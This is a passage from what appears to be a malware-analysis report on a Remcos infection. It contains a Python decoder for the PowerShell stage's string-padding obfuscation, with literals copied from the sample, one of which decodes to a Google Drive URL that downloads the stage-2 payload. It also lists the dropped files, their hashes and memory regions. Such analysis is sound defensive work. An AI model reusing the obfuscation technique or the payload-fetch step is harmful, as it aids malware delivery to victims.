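# Added example for this page: a decoder for the string padding used by the
# PowerShell stage in the process tree. Literals are copied from that command
# line; the functions are not the sample's own code.


def cmd_set_a(expr: str) -> int:
    """Evaluate the sample's 'cmd /c set /A 115^^0' trick.

    cmd.exe treats '^' as its escape character, so '^^' reaches set /A as a
    single '^', which is bitwise XOR there. 115 ^ 0 == 115 == ord('s'): the
    script builds the method name 'substring' without writing it out.
    """
    left, right = expr.split("^^")
    return int(left) ^ int(right)


def decode_padded(s: str, start: int = 7, step: int = 8) -> str:
    """Mirror of the sample's albertuss function.

    $Mistletoes is the step (8), $Coapprover starts at 7, and the loop bound
    is Ridefogders(s) == len(s) - 1, so the literal's last character is never
    read. Every eighth character is real; the other seven are padding.
    """
    limit = len(s) - 1
    return "".join(s[i] for i in range(start, limit, step))


def decode_all(script: str, decoder_name: str = "albertuss") -> list[str]:
    """Decode every single-quoted literal passed to the decoder function."""
    pattern = re.compile(re.escape(decoder_name) + r" '([^']*)'")
    return [decode_padded(m.group(1)) for m in pattern.finditer(script)]


# $Rebuffably: the verb Reflectorizing dot-sources each decoded string into.
REBUFFABLY = "QuintusiSauerkrekvoterexfys,ote "
# $Iatrochemical: a plain word, a handy sanity check of offset and step.
IATROCHEMICAL = " RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk "
# $Mynas248: the stage-2 URL. Only the prefix decodes cleanly from this page
# because dropped non-ASCII padding characters shift the alignment later on.
MYNAS248 = (
    "JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/"
    " Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg Gangsho"
    "Mu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewism"
    "Syvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasasto"
    "Anaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign Exocycl"
    "Thermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1"
    "Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eov"
    "GleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7"
    "OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9"
    "ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXH"
    "ollywo "
)

# Constructed fragment in the shape of the real command line, for decode_all.
SNIPPET = (
    "$Pebermynters=(cmd /c set /A 115^^0);"
    f"$Iatrochemical=albertuss '{IATROCHEMICAL}';"
    f"$Mynas248=albertuss '{MYNAS248}';"
    f"$Rebuffably=albertuss '{REBUFFABLY}';"
)


def decode_report_strings() -> dict[str, str]:
    """Decode the literals taken from this report's PowerShell stage."""
    return {
        "substring_first_char": chr(cmd_set_a("115^^0")),
        "Rebuffably": decode_padded(REBUFFABLY),
        "Iatrochemical": decode_padded(IATROCHEMICAL),
        "Mynas248": decode_padded(MYNAS248),
    }


if __name__ == "__main__":
    for name, value in decode_report_strings().items():
        print(f"{name:>22}: {value!r}")
```

Run it against the full .vbs-extracted script with `decode_all(script_text)` to recover every literal in one pass; on this page's copy the URL comes out as `https://drive.google.com/uc?export=download&id=` followed by a file ID whose tail is visibly corrupted, which is the expected symptom of the dropped characters rather than a decoder fault.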

        Network

              MITRE ATT&CK Enterprise v15

              Downloads

              • C:\ProgramData\Remcos\remcos.exe

                Filesize

                504KB

                MD5

                251e51e2fedce8bb82763d39d631ef89

                SHA1

                677a3566789d4da5459a1ecd01a297c261a133a2

                SHA256

                2682086ace1970d5573f971669591b731f87d749406927bd7a7a4b58c3c662e9

                SHA512

                3b49e6d9197b12ca7aa282707d62496d9feac32b3f6fd15affd4eaaa5239da903fadd4600a1d17a45ec330a590fc86218c9a7dc20306b52d8170e04b0e325521

              • C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

                Filesize

                673B

                MD5

                bcf7e6cfcc8a6a11785cd484871da9df

                SHA1

                611dfe4e01e13c242d1e80be9b045c1353d0f61d

                SHA256

                5a0fb77a4d67c6d19672418b57e59b2afccdb5b902e2971b334aa8efac972e7a

                SHA512

                841cf9ed0285c7e1474a728831081d1f814d685dff154cdf7a006118f6d3f0437eab99233b7cb8074ba7ad0a1ea472138baa8916e32209cede173393db09d15b

              • C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

                Filesize

                5KB

                MD5

                22e79aa7aa0322451169b0f596317371

                SHA1

                fffac880e9b0924315671291d729587dd489e753

                SHA256

                26c664aac237da4c835aed3fe7c42924cf7321a05b1c2fc867ae85d05311345d

                SHA512

                3a1a864cb569e6fc6253c00970838fb8ba2eb6f7d73ec359b41314c1bed7db1ee523203b099f451d805cad94da8381364b50cbc4dd34183b81197b62ffd4e699

              • C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

                Filesize

                2KB

                MD5

                ae73da7669431d6182ed2b6e32f9c50b

                SHA1

                d6a50e8c793a38076ba6d3c1a51330d4cefe7d1c

                SHA256

                c6a241bd7c5b06f24f4d8b2081bca073dbf28be5d074d8697ac4c982de2047cd

                SHA512

                2201d05fb6a988619048952529c7d0f81beec714bcec0a7f4aca8d99dcd27bd752026ff5fb352297ce750c0888e60df1958d0d7e2a7106a036be5ac90ef77355

              • C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

                Filesize

                3KB

                MD5

                d504221e972e2a55a11fcd37ff8a65f3

                SHA1

                672a2179a364e9eff0e73ee0442b59a6ca653551

                SHA256

                5ff870b4247bef7038a3951f9f51c7e04c93ef2d00a2db616ffd3e97ab3a8539

                SHA512

                82484bd3f4a7b4321dd660f2b21af57a426cea3f2202bc5f9c5bcd1c27cdfbd6050d8b4d455ac4406ed6d99ffc61e5812afc0919956baed817b076fb9506dd33

              • C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

                Filesize

                3KB

                MD5

                65639b482f421b4f0b69c0577dde45af

                SHA1

                b24b468bd77562e589985c03afcad1d75860a9b9

                SHA256

                19e8d8a6ff2bf2b0ddb5d93987db9ab05a9db48691db7ec0459cb2cbdd4adcb0

                SHA512

                ac0ebeedd10cddafb451745b69eb33ec263d892778d33989fe6c12123be339f28aa5d6db617817e422dbd556c23f2f483a7781d10a4bee2c5b3e804f19681233

              • C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

                Filesize

                3KB

                MD5

                096516060f03f1620d514a7cf7dc7ece

                SHA1

                a88c3bfe2243d3d6fe3521796bb131eab3f38e0c

                SHA256

                b93fc066a8f6e1d222e6fd2ab3c4fa83b2fe550a21e7c1b85b7b972758b178cd

                SHA512

                08688144066e8f4557fc01abc0ad9b27d38e72012eb554d0d9da9ab3d131411ae925ae2f958d5d5443476edd4d8876985f2575a5c4914ac8227c40e5e3610348

              • C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

                Filesize

                5KB

                MD5

                de60fa125bd8607d7d104d0a66b48bb9

                SHA1

                e719638fa0e3f13a112de168c35e0dd39da1516b

                SHA256

                88ff083beef008e5796945f4da905f9e0f65ac750478fce12ef72a35f0a50e08

                SHA512

                21e8926d4ee48744e8511a9a294f0352fd1f7198b3aeb11700e0df7b136fec393266d8c8ade8fce78336be89cb496800a566795a7c341ed766887db6bf54b47b

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_21ku05eb.1cw.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • memory/3256-269-0x000002DF43B10000-0x000002DF43B20000-memory.dmp

                Filesize

                64KB

              • memory/3256-293-0x00007FFE10EF0000-0x00007FFE119B1000-memory.dmp

                Filesize

                10.8MB

              • memory/3256-271-0x000002DF43B10000-0x000002DF43B20000-memory.dmp

                Filesize

                64KB

              • memory/3256-270-0x000002DF43B10000-0x000002DF43B20000-memory.dmp

                Filesize

                64KB

              • memory/3256-272-0x000002DF5C370000-0x000002DF5C396000-memory.dmp

                Filesize

                152KB

              • memory/3256-273-0x000002DF5C5D0000-0x000002DF5C5E4000-memory.dmp

                Filesize

                80KB

              • memory/3256-404-0x00007FFE10EF0000-0x00007FFE119B1000-memory.dmp

                Filesize

                10.8MB

              • memory/3256-268-0x00007FFE10EF0000-0x00007FFE119B1000-memory.dmp

                Filesize

                10.8MB

              • memory/3256-258-0x000002DF43B20000-0x000002DF43B42000-memory.dmp

                Filesize

                136KB

              • memory/3256-302-0x000002DF43B10000-0x000002DF43B20000-memory.dmp

                Filesize

                64KB

              • memory/3256-301-0x000002DF43B10000-0x000002DF43B20000-memory.dmp

                Filesize

                64KB

              • memory/3380-276-0x0000000002C50000-0x0000000002C60000-memory.dmp

                Filesize

                64KB

              • memory/3380-278-0x00000000055B0000-0x00000000055D2000-memory.dmp

                Filesize

                136KB

              • memory/3380-290-0x00000000060B0000-0x0000000006404000-memory.dmp

                Filesize

                3.3MB

              • memory/3380-291-0x00000000065A0000-0x00000000065BE000-memory.dmp

                Filesize

                120KB

              • memory/3380-292-0x0000000006630000-0x000000000667C000-memory.dmp

                Filesize

                304KB

              • memory/3380-279-0x0000000005DE0000-0x0000000005E46000-memory.dmp

                Filesize

                408KB

              • memory/3380-294-0x0000000007E30000-0x00000000084AA000-memory.dmp

                Filesize

                6.5MB

              • memory/3380-295-0x0000000006B70000-0x0000000006B8A000-memory.dmp

                Filesize

                104KB

              • memory/3380-296-0x0000000007850000-0x00000000078E6000-memory.dmp

                Filesize

                600KB

              • memory/3380-297-0x00000000077E0000-0x0000000007802000-memory.dmp

                Filesize

                136KB

              • memory/3380-298-0x0000000008A60000-0x0000000009004000-memory.dmp

                Filesize

                5.6MB

              • memory/3380-299-0x00000000077B0000-0x00000000077D2000-memory.dmp

                Filesize

                136KB

              • memory/3380-300-0x0000000007A80000-0x0000000007A94000-memory.dmp

                Filesize

                80KB

              • memory/3380-275-0x00000000744D0000-0x0000000074C80000-memory.dmp

                Filesize

                7.7MB

              • memory/3380-277-0x0000000005640000-0x0000000005C68000-memory.dmp

                Filesize

                6.2MB

              • memory/3380-303-0x0000000007CC0000-0x0000000007CC1000-memory.dmp

                Filesize

                4KB

              • memory/3380-304-0x0000000009010000-0x000000000C2CB000-memory.dmp

                Filesize

                50.7MB

              • memory/3380-305-0x0000000009010000-0x000000000C2CB000-memory.dmp

                Filesize

                50.7MB

              • memory/3380-307-0x00000000744D0000-0x0000000074C80000-memory.dmp

                Filesize

                7.7MB

              • memory/3380-308-0x0000000002C50000-0x0000000002C60000-memory.dmp

                Filesize

                64KB

              • memory/3380-309-0x0000000076EF1000-0x0000000077011000-memory.dmp

                Filesize

                1.1MB

              • memory/3380-274-0x0000000002C70000-0x0000000002CA6000-memory.dmp

                Filesize

                216KB

              • memory/3380-311-0x0000000002C50000-0x0000000002C60000-memory.dmp

                Filesize

                64KB

              • memory/3380-312-0x0000000009010000-0x000000000C2CB000-memory.dmp

                Filesize

                50.7MB

              • memory/3380-395-0x0000000009010000-0x000000000C2CB000-memory.dmp

                Filesize

                50.7MB

              • memory/3380-280-0x0000000005F40000-0x0000000005FA6000-memory.dmp

                Filesize

                408KB

              • memory/3380-382-0x00000000744D0000-0x0000000074C80000-memory.dmp

                Filesize

                7.7MB

              • memory/4384-315-0x0000000076F78000-0x0000000076F79000-memory.dmp

                Filesize

                4KB

              • memory/4384-331-0x0000000076EF1000-0x0000000077011000-memory.dmp

                Filesize

                1.1MB

              • memory/4384-380-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-328-0x0000000001F70000-0x000000000522B000-memory.dmp

                Filesize

                50.7MB

              • memory/4384-381-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-314-0x0000000076EF1000-0x0000000077011000-memory.dmp

                Filesize

                1.1MB

              • memory/4384-383-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-384-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-313-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-396-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-397-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-393-0x0000000001F70000-0x000000000522B000-memory.dmp

                Filesize

                50.7MB

              • memory/4384-400-0x0000000000D10000-0x0000000000D92000-memory.dmp

                Filesize

                520KB

              • memory/4384-403-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-310-0x0000000001F70000-0x000000000522B000-memory.dmp

                Filesize

                50.7MB

              • memory/4384-405-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-406-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-407-0x0000000000D10000-0x0000000000D92000-memory.dmp

                Filesize

                520KB

              • memory/4384-408-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-409-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-410-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-411-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB